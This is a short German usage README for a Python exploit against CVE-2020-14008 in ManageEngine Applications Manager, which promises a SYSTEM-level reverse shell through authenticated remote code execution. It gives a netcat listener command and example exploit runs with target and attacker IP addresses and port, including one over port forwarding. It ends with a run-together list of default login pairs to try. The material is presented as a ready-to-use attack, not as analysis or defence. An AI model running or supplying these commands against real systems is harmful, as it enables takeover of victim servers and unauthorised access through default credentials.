
Python-Exploit für CVE-2020-14008 in ManageEngine Applications Manager, der eine SYSTEM-level Reverse-Shell über authentifizierte Remote-Codeausführung liefert.
Dieses Skript nutzt CVE-2020-14008 in ManageEngine Applications Manager aus, um eine Reverse Shell mit SYSTEM-Berechtigungen zu erhalten.
pip3 install requests urllib3
nc -nlvp 9001
python3 cve-2020-14008-exploit.py <target_url> <username> <password> <your_ip> <your_port>
# Direkter Angriff
python3 cve-2020-14008-exploit.py https://192.168.1.100:8443 admin admin 192.168.1.50 9001
# Über Portweiterleitung
python3 cve-2020-14008-exploit.py https://localhost:8443 admin admin 127.0.0.1 9001
admin:adminadministrator:administratorguest:guest